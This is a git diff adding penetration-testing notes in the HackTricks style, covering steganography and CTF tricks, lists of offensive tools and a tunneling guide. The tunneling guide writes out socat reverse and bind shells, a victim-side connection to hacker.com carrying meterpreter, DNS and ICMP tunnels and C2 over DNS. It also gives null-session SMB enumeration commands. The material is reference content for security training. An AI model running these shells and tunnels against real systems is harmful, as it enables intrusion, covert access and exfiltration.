+Find hidden content using Fast Fourier T  
+Check it in:
+
+* [http://bigwww.epfl.ch/demo/ip/demos/FFT/](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
+* [http://www.ejectamenta.com/Imaging-Experiments/fourierimagefiltering.html](http://www.ejectamenta.com/Imaging-Experiments/fourierimagefiltering.html)
+
+### Stegpy \[PNG, BMP, GIF, WebP, WAV\]
+
+A program for encoding information in image and audio files through steganography. It can store it in plain and encrypted.  
+Find it in [github](https://github.com/dhsdshdhk/stegpy).
+
+### Pngcheck
+
+Get details on a PNG file \(or find out is is actually something else\).  
+`apt-get isntall pngcheck`: Install the tool  
+`pngcheck stego.png` : Obtain info
+
+### Other tools
+
+* [http://magiceye.ecksdee.co.uk/](http://magiceye.ecksdee.co.uk/)
+* [https://29a.ch/sandbox/2012/imageerrorlevelanalysis/](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
+
+## Extracting data from audios
+
+### [Steghide \[JPEG, BMP, WAV, AU\]](stego-tricks.md#steghide) <a id="steghide"></a>
+
+### [Stegpy \[PNG, BMP, GIF, WebP, WAV\]](stego-tricks.md#stegpy-png-bmp-gif-webp-wav)
+
+### ffmpeg
+
+ffmpeg can be used to check integrity of audio files and let it report infos and errors.  
+ `ffmpeg -v info -i stego.mp3 -f null -`
+
+### Wavsteg \[WAV\] <a id="wavsteg"></a>
+
+WavSteg is a python3 tool that can hide data \(using least significant bit\) in wav files and can also extract data from wav files.  
+You can get it from [github](https://github.com/ragibson/Steganography#WavSteg)  
+Useful commands:  
+ `python3 WavSteg.py -r -b 1 -s soundfile -o outputfile` : Extracts to output \(taking only 1 lsb\)  
+ `python3 WavSteg.py -r -b 2 -s soundfile -o outputfile` : Extracts to output \(taking only 2 lsb\)
+
+### Deepsound
+
+Hide information encrypted using AES-265  
+Download from [the oficial page](http://jpinsoft.net/deepsound/download.aspx).  
+Run it and open the file and check if DeepSound finds any data hidden, in taht case you will need to provide the password.
+
+### Sonic visualizer <a id="sonic-visualizer"></a>
+
+Sonic visualizer is a tool for viewing and analyzing the contents of audio files, however it can be helpful when dealing with audio steganography. You can reveal hidden shapes in audio files.   
+You should always check the spectrogram of the audio.  
+ [Offical Website](https://www.sonicvisualiser.org/)
+
+### DTMF Tones - Dial tones
+
+* [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/)
+* [http://dialabc.com/sound/detect/index.html](http://dialabc.com/sound/detect/index.html)
+
+## Other tricks
+
+### Binary length SQRT - QR Code
+
+If you receibe a length of a binary data whose SQRT is an entire number, think that it can be some kind of QR code:
+
+```text
+import math
+math.sqrt(2500) #50
+```
+
+From "1"s and "0"s to image: [ https://www.dcode.fr/binary-image](%20https://www.dcode.fr/binary-image)  
+Read a QR code: [https://online-barcode-reader.inliteresearch.com/](https://online-barcode-reader.inliteresearch.com/)
+
+### Braile
+
+[https://www.branah.com/braille-translator](https://www.branah.com/braille-translator%29)
+
+
+
+
+
diff --git a/todo/misc.md b/todo/misc.md
new file mode 100644
index 00000000..8902cbfd
--- /dev/null
+++ b/todo/misc.md
@@ -0,0 +1,62 @@
+# MISC
+
+In a ping response TTL:  
+127 = Windows  
+254 = Cisco  
+Lo demás,algunlinux
+
+$1$- md5  
+$2$or $2a$ - Blowfish  
+$5$- sha256  
+$6$- sha512
+
+If you do not know what is behind a service, try to make and HTTP GET request.
+
+**UDP Scans**  
+nc -nv -u -z -w 1 &lt;IP&gt; 160-16
+
+An empty UDP packet is sent to a specific port. If the UDP port is open, no reply is sent back from the target machine. If the UDP port is closed, an ICMP port unreachable packet should be sent back from the target machine.  
+
+
+UDP port scanning is often unreliable, as firewalls and routers may drop ICMP  
+ packets. This can lead to false positives in your scan, and you will regularly see  
+ UDP port scans showing all UDP ports open on a scanned machine.  
+ o Most port scanners do not scan all available ports, and usually have a preset list  
+ of “interesting ports” that are scanned.
+
+## CTF - Tricks
+
+In **Windows** use **Winzip** to search for files.  
+**Alternate data Streams**: _dir /r \| find ":$DATA"_  
+
+
+```text
+binwalk --dd=".*" <file> #Extract everything
+binwalk -M -e -d=10000 suspicious.pdf #Extract, look inside extracted files and continue extracing (depth of 10000)
+```
+
+### Crypto
+
+**featherduster**  
+
+
+**Basae64**\(6—&gt;8\) —&gt; 0...9, a...z, A…Z,+,/  
+**Base32**\(5 —&gt;8\) —&gt; A…Z, 2…7  
+**Base85** \(Ascii85, 7—&gt;8\) —&gt; 0...9, a...z, A...Z, ., -, :, +, =, ^, !, /, \*, ?, &, &lt;, &gt;, \(, \), \[, \], {, }, @, %, $, \#  
+**Uuencode** --&gt; Start with "_begin &lt;mode&gt; &lt;filename&gt;_" and weird chars  
+**Xxencoding** --&gt; Start with "_begin &lt;mode&gt; &lt;filename&gt;_" and B64  
+  
+**Vigenere** \(frequency analysis\) —&gt; [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)  
+**Scytale** \(offset of characters\) —&gt; [https://www.dcode.fr/scytale-cipher](https://www.dcode.fr/scytale-cipher)
+
+**25x25 = QR**
+
+factordb.com  
+rsatool
+
+Snow --&gt; Hide messages using spaces and tabs
+
+## Characters
+
+%E2%80%AE =&gt; RTL Character \(writes payloads backwards\)
+
diff --git a/todo/more-tools.md b/todo/more-tools.md
new file mode 100644
index 00000000..771265d3
--- /dev/null
+++ b/todo/more-tools.md
@@ -0,0 +1,115 @@
+# More Tools
+
+## BlueTeam
+
+* [https://github.com/yarox24/attack\_monitor](https://github.com/yarox24/attack_monitor)
+* [https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/](https://capsule8.com/blog/dont-get-kicked-out-a-tale-of-rootkits-and-other-backdoors/)
+* [https://github.com/ION28/BLUESPAWN](https://github.com/ION28/BLUESPAWN)
+* [https://github.com/PaperMtn/lil-pwny](https://github.com/PaperMtn/lil-pwny) : Check disclosed accounts
+* [https://github.com/rabobank-cdc/DeTTECT](https://github.com/rabobank-cdc/DeTTECT)
+
+## OSINT
+
+* [https://github.com/3vangel1st/kamerka](https://github.com/3vangel1st/kamerka)
+* [https://github.com/BullsEye0/google\_dork\_list](https://github.com/BullsEye0/google_dork_list)
+* [https://github.com/highmeh/lure](https://github.com/highmeh/lure)
+* [https://www.shodan.io/](https://www.shodan.io/)
+* [https://censys.io/](https://censys.io/)
+* [https://viz.greynoise.io/table](https://viz.greynoise.io/table)
+* [https://www.zoomeye.org](https://www.zoomeye.org)
+* [https://fofa.so](https://fofa.so)
+* [https://www.onyphe.io](https://www.onyphe.io)
+* [https://app.binaryedge.io](https://app.binaryedge.io)
+* [https://hunter.io](https://hunter.io)
+* [https://wigle.net](https://wigle.net)
+* [https://ghostproject.fr](https://ghostproject.fr)
+* [https://www.oshadan.com/](https://www.oshadan.com/)
+* [https://builtwith.com/](https://builtwith.com/)
+* [https://www.spiderfoot.net/](https://www.spiderfoot.net/)
+* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
+
+## **WEB**
+
+* [https://github.com/AlisamTechnology/ATSCAN](https://github.com/AlisamTechnology/ATSCAN)
+* [https://github.com/momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder)
+* [https://github.com/hahwul/XSpear](https://github.com/hahwul/XSpear)
+* [https://github.com/BitTheByte/Monitorizer/](https://github.com/BitTheByte/Monitorizer/)
+* [https://github.com/spinkham/skipfish](https://github.com/spinkham/skipfish)
+* [https://github.com/blark/aiodnsbrute](https://github.com/blark/aiodnsbrute) : Brute force domain names asynchronously
+* [https://crt.sh/?q=%.yahoo.com](https://crt.sh/?q=%.yahoo.com) : Subdomain bruteforce
+* [https://github.com/tomnomnom/httprobe](https://github.com/tomnomnom/httprobe): Check if web servers in a domain are accessible
+* [https://github.com/aboul3la/Sublist3r](https://github.com/aboul3la/Sublist3r) : Subdomain discovery
+* [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) : Subdomain discovery in github
+* [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) : Fast port scanning
+* [https://github.com/Threezh1/JSFinder](https://github.com/Threezh1/JSFinder) : Subdomains and URLs from JS files in a web
+* [https://github.com/C1h2e1/MyFuzzingDict](https://github.com/C1h2e1/MyFuzzingDict) : Web files dictionary
+* [https://github.com/TypeError/Bookmarks/blob/master/README.md](https://github.com/TypeError/Bookmarks/blob/master/README.md) : BurpExtension to avoid dozens  repeater tabs
+* [https://github.com/hakluke/hakrawler](https://github.com/hakluke/hakrawler) : Obtain assets
+* [https://github.com/izo30/google-dorker](https://github.com/izo30/google-dorker) : Google dorks
+* [https://github.com/sehno/Bug-bounty/blob/master/bugbounty\_checklist.md](https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md) : Web BugBounty checklist
+* [https://github.com/Naategh/dom-red](https://github.com/Naategh/dom-red) : Check a list of domain against Open Redirection
+* [https://github.com/prodigysml/Dr.-Watson](https://github.com/prodigysml/Dr.-Watson) : Burp plugin, offline analysis to discover domains, subdomains and IPs
+* [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons): List of different tools
+* [https://github.com/gauravnarwani97/Trishul](https://github.com/gauravnarwani97/Trishul) : BurpSuite Plugingto find vulns \(SQLi, XSS, SSTI\)
+* [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker) : Chrome extension for tracking post-messages functions
+* [https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize) : Automatic authentication tests \(remove cookies and try to send the request\)
+* [https://github.com/pikpikcu/xrcross](https://github.com/pikpikcu/xrcross): XRCross is a Reconstruction, Scanner, and a tool for penetration / BugBounty testing. This tool was built to test \(XSS\|SSRF\|CORS\|SSTI\|IDOR\|RCE\|LFI\|SQLI\) vulnerabilities
+
+## Windows
+
+* [https://github.com/Mr-Un1k0d3r/PoisonHandler](https://github.com/Mr-Un1k0d3r/PoisonHandler) : Lateral movements
+* [https://freddiebarrsmith.com/trix/trix.html](https://freddiebarrsmith.com/trix/trix.html) : LOL bins
+* [https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79](https://gist.github.com/netbiosX/ee35fcd3722e401a38136cff7b751d79) \([https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)\): Persistence
+* [https://github.com/odzhan/injection](https://github.com/odzhan/injection) : Windows Process Injection techniques 
+* [https://github.com/BankSecurity/Red\_Team](https://github.com/BankSecurity/Red_Team) : Red Team scripts
+* [https://github.com/l0ss/Grouper2](https://github.com/l0ss/Grouper2) : find security-related misconfigurations in Active Directory Group Policy.
+* [https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring](https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring) : Securestring obfuscation
+* [https://pentestlab.blog/2020/02/24/parent-pid-spoofing/](https://pentestlab.blog/2020/02/24/parent-pid-spoofing/) : Parent PID Spoofing
+* [https://github.com/the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) : Encrypt Powershell payloads
+* [https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/](https://shells.systems/introducing-ninja-c2-the-c2-built-for-stealth-red-team-operations/) : Stealth C2
+* [https://windows-internals.com/faxing-your-way-to-system/](https://windows-internals.com/faxing-your-way-to-system/) : Series of logs about Windows Internals
+* [https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/](https://bestestredteam.com/2018/10/02/tracking-pixel-in-microsoft-office-document/) : Track who open a document
+* [https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet) : Active Directory Cheat Sheet
+
+## Firmware
+
+Tools q veo q pueden molar para analizar firmares \(automaticas\):
+
+* [https://github.com/craigz28/firmwalker](https://github.com/craigz28/firmwalker)
+* [https://github.com/fkie-cad/FACT\_core](https://github.com/fkie-cad/FACT_core)
+* [https://gitlab.com/bytesweep/bytesweep-go](https://gitlab.com/bytesweep/bytesweep-go)
+
+Post-crema:
+
+* [https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html](https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html)
+* [https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html](https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html)
+
+Como extraer firmware si no lo encontramos online: [https://www.youtube.com/watch?v=Kxvpbu9STU4](https://www.youtube.com/watch?v=Kxvpbu9STU4)
+
+Aqui un firware con vulnerabilidades para analizar: [https://github.com/scriptingxss/IoTGoat](https://github.com/scriptingxss/IoTGoat)
+
+y por aqui la metodologia owasp para analizar firmware: [https://github.com/scriptingxss/owasp-fstm](https://github.com/scriptingxss/owasp-fstm)
+
+## OTHER
+
+* [https://twitter.com/HackAndDo/status/1202695084543791117](https://twitter.com/HackAndDo/status/1202695084543791117)
+* [https://github.com/weev3/LKWA](https://github.com/weev3/LKWA)
+* [https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/](https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/)
+* [https://github.com/skelsec/jackdaw](https://github.com/skelsec/jackdaw)
+* [https://github.com/CoatiSoftware/Sourcetrail](https://github.com/CoatiSoftware/Sourcetrail) : Static code analysis
+* [https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html](https://www.hackerdecabecera.com/2019/12/blectf-capture-flag-en-formato-hardware.html) : Bluetooth LE CTF
+* [https://github.com/skeeto/endlessh](https://github.com/skeeto/endlessh) : SSH tarpit that slowly sends an endless banner.
+* AWS and Cloud tools: [https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
+* IFS \(Interplanetary File System\) for phising: [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/using-the-interplanetary-file-system-for-offensive-operations/)
+* IP rotation services: [https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212](https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212)
+* Linux rootkit: [https://github.com/aesophor/satanic-rootkit](https://github.com/aesophor/satanic-rootkit)
+* [https://theia-ide.org/](https://theia-ide.org/) : Online IDE
+* [https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/) : Resources for starting on BugBounties
+* [https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab](https://medium.com/macoclock/jailbreak-and-stuff-kickstart-tools-and-techniques-for-ios-application-pentesting-6fa53a3987ab) : IOS pentesting tools
+* [https://github.com/random-robbie/keywords/blob/master/keywords.txt](https://github.com/random-robbie/keywords/blob/master/keywords.txt) : Keywords
+* [https://github.com/ElevenPaths/HomePWN](https://github.com/ElevenPaths/HomePWN) : Hacking IoT \(Wifi, BLE, SSDP, MDNS\)
+* [https://github.com/rackerlabs/scantron](https://github.com/rackerlabs/scantron) : automating scanning
+* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
+
+## 
+
diff --git a/todo/pentesting-dns.md b/todo/pentesting-dns.md
new file mode 100644
index 00000000..c5562ee8
--- /dev/null
+++ b/todo/pentesting-dns.md
@@ -0,0 +1,8 @@
+# Pentesting DNS
+
+**Research more about attacks to DNS**
+
+**DNSSEC and DNSSEC3**
+
+**DNS in IPv6**
+
diff --git a/tr-069.md b/tr-069.md
new file mode 100644
index 00000000..ff8a3862
--- /dev/null
+++ b/tr-069.md
@@ -0,0 +1,2 @@
+# TR-069
+
diff --git a/tunneling-and-port-forwarding.md b/tunneling-and-port-forwarding.md
new file mode 100644
index 00000000..a12c8826
--- /dev/null
+++ b/tunneling-and-port-forwarding.md
@@ -0,0 +1,330 @@
+# Tunneling and Port Forwarding
+
+## **SSH**
+
+SSH graphical connection \(X\)
+
+```bash
+ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
+```
+
+### Local Port2Port
+
+Open new Port in SSH Server --&gt; Other port
+
+```bash
+ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere
+```
+
+```bash
+ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere
+```
+
+### Port2Port
+
+Local port --&gt; Compromised host \(SSH\) --&gt; Third\_box:Port
+
+```bash
+ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f]  #This way the terminal is still in your host 
+#Example
+sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised> 
+```
+
+### Port2hostnet \(proxychains\)
+
+Local Port --&gt; Compromised host\(SSH\) --&gt; Wherever
+
+```bash
+ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
+```
+
+### VPN-Tunnel
+
+You need **root in both devices** \(as you are going to create new interfaces\) and the sshd config has to allow root login:  
+`PermitRootLogin yes`  
+`PermitTunnel yes`
+
+```bash
+ssh username@server -w any:any #This wil create Tun interfaces in both devices
+ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0 #Client side VPN IP
+ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP
+```
+
+Enable forwarding in Server side
+
+```bash
+echo 1 > /proc/sys/net/ipv4/ip_forward
+iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
+```
+
+Set new route on client side
+
+```text
+route add -net 10.0.0.0/16 gw 1.1.1.1
+```
+
+## SSHUTTLE
+
+You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.  
+Example, forwarding all the traffic going to 10.10.10.0/24
+
+```bash
+pip install sshuttle
+sshuttle -r user@host 10.10.10.10/24
+```
+
+## Meterpreter
+
+### Port2Port
+
+Local port --&gt; Compromised host \(active session\) --&gt; Third\_box:Port
+
+```bash
+# Inside a meterpreter session
+portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
+```
+
+### Port2hostnet \(proxychains\)
+
+```bash
+background# meterpreter session
+route add <IP_victim> <Netmask> <Session> # (ex: route add 10.10.10.14 2552.55.255.0 8)
+use auxiliary/server/socks4a
+run #Proxy port 1080 by default
+echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
+```
+
+Another way:
+
+```bash
+background #meterpreter session
+use post/windows/manage/autoroute
+set SESSION <session_n>
+set SUBNET <New_net_ip> #Ex: set SUBNET 10.1.13.0
+set NETMASK <Netmask>
+run
+use auxiliary/server/socks4a
+run #Proxy port 1080 by default
+```
+
+## reGeorg
+
+[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
+
+You need to upload a web file tunnel: ashx\|aspx\|js\|jsp\|php\|php\|jsp
+
+```bash
+python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
+```
+
+## Rpivot
+
+[https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
+
+Reverse tunnel. The tunnel is started from the victim.  
+A socks4 proxy is created on 127.0.0.1:1080
+
+```bash
+attacker> python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
+```
+
+```bash
+victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999
+```
+
+Pivot through **NTLM proxy**
+
+```bash
+victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd
+```
+
+```bash
+victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
+```
+
+## **Socat**
+
+[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
+
+### Bind shell
+
+```bash
+victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
+attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337 
+```
+
+### Reverse shell
+
+```bash
+attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
+victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
+```
+
+### Port2Port
+
+```bash
+socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>,<rport> &
+```
+
+### Port2Port through socks
+
+```bash
+socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
+```
+
+### Meterpreter through SSL Socat
+
+```bash
+#Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
+attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333
+```
+
+```bash
+victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
+#Execute the meterpreter
+```
+
+You can bypass a **non-authenticated proxy** executing this line instead of the last one in the victim's console:
+
+```bash
+OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacker.com:443,connect-timeout=5|TCP:proxy.lan:8080,connect-timeout=5
+```
+
+[https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/)
+
+###  SSL Socat Tunnel
+
+**/bin/sh console**
+
+Create certificates in both sides: Client and Server
+
+```bash
+# Execute this commands in both sides
+FILENAME=socatssl
+openssl genrsa -out $FILENAME.key 1024
+openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
+cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
+chmod 600 $FILENAME.key $FILENAME.pem
+```
+
+```bash
+attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh
+victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
+```
+
+### Remote Port2Port
+
+Connect the local SSH port \(22\) to the 443 port of the attacker host
+
+```bash
+attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost 
+victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22 
+attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim
+```
+
+## Plink.exe
+
+It's like a console PuTTY version \( the options are very similar to a ssh client\).
+
+As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine:
+
+```bash
+plink.exe -l <Our_valid_username> -pw <valid_password> -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
+plink.exe -l root -pw password -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
+```
+
+## NTLM proxy bypass
+
+The previously mentioned tool: **Rpivot**  
+**OpenVPN** can also bypass it, setting these options in the configuration file:
+
+```bash
+http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
+```
+
+### Cntlm
+
+[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/)
+
+ It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.  
+Example that forward port 443
+
+```text
+Username Alice 
+Password P@ssw0rd 
+Domain CONTOSO.COM 
+Proxy 10.0.0.10:8080 
+Tunnel 2222:<attackers_machine>:443
+```
+
+Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.  
+You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222.
+
+## YARP
+
+A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
+
+## DNS Tunneling
+
+### Iodine
+
+[https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)
+
+Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries.
+
+```text
+attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com
+victim> iodine -f -P P@ssw0rd tunneldomain.com -r
+#You can see the victim at 1.1.1.2
+```
+
+The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using:
+
+```text
+ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
+```
+
+### DNSCat2
+
+Establishes a C&C channel through DNS. It doesn't need root privileges.
+
+```bash
+attacker> ruby ./dnscat2.rb tunneldomain.com
+victim> ./dnscat2 tunneldomain.com
+```
+
+**Port forwarding with dnscat**
+
+```bash
+session -i <sessions_id>
+listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
+```
+
+#### Change proxychains DNS
+
+Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** \(hardcoded\). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**.
+
+## Tunnels in Go
+
+[https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel)
+
+## ICMP Tunneling
+
+### Hans
+
+[https://github.com/friedrich/hans](https://github.com/friedrich/hans)  
+[https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel)
+
+Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests.
+
+```bash
+./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
+./hans -f -c <server_ip> -p P@ssw0rd -v
+ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
+```
+
+## Other tools to check
+
+* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
+* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
+
diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md
new file mode 100644
index 00000000..84aa13a8
--- /dev/null
+++ b/windows/active-directory-methodology/README.md
@@ -0,0 +1,400 @@
+# Active Directory Methodology
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## Basic overview
+
+Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.
+
+The Active Directory structure includes three main tiers: 1\) domains, 2\) trees, and 3\) forests. Several objects \(users or devices\) that all use the same database may be grouped in to a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.
+
+Main concepts of an Active Directory:
+
+1. **Directory** – Contains all the information about the objects of the Active directory
+2. **Object** – An object references almost anything inside the directory \(a user, group, shared folder...\)
+3. **Domain** – The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection. 
+4. **Tree** – Group of domains with the same root. Example: _dom.local, email.com.local, www.dom.local_
+5. **Forest** – The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships.
+
+Active Directory provides several different services, which fall under the umbrella of "Active Directory Domain Services," or AD DS. These services include:
+
+1. **Domain Services** – stores centralized data and manages communication between users and domains; includes login authentication and search functionality
+2. **Certificate Services** – creates, distributes, and manages secure certificates
+3. **Lightweight Directory Services** – supports directory-enabled applications using the open \(LDAP\) protocol
+4. **Directory Federation Services** – provides single-sign-on \(SSO\) to authenticate a user in multiple web applications in a single session
+5. **Rights Management** – protects copyrighted information by preventing unauthorized use and distribution of digital content
+6. **DNS Service** – Used to resolve domain names.
+
+AD DS is included with Windows Server \(including Windows Server 10\) and is designed to manage client systems. While systems running the regular version of Windows do not have the administrative features of AD DS, they do support Active Directory. This means any Windows computer can connect to a Windows workgroup, provided the user has the correct login credentials.  
+**From:** [**https://techterms.com/definition/active\_directory**](https://techterms.com/definition/active_directory)\*\*\*\*
+
+### **Kerberos Authentication**
+
+To learn how to **attack an AD** you need to **understand** really good the **Kerberos authentication process**.  
+[**Read this page if you still don't know how it works.**](kerberos-authentication.md)\*\*\*\*
+
+## Recon Active Directory \(No creds/sessions\)
+
+If you just have access to an AD environment but you don't have any credentials/sessions you could:
+
+* **Pentest the network:** Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them \(for example, ****[**printers could be very interesting targets**](ad-information-in-printers.md)\). Take a look to the General ****[**Pentesting Methodology**](../../pentesting-methodology.md) ****to find more information about how to do this.
+* **Check for null and Guest access on smb services** \(this won't work on modern Windows versions\):
+  * `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
+  * `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
+  * `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
+  * [**A more detailed guide on how to enumerate a SMB server can be found here.**](../../pentesting/pentesting-smb.md)\*\*\*\*
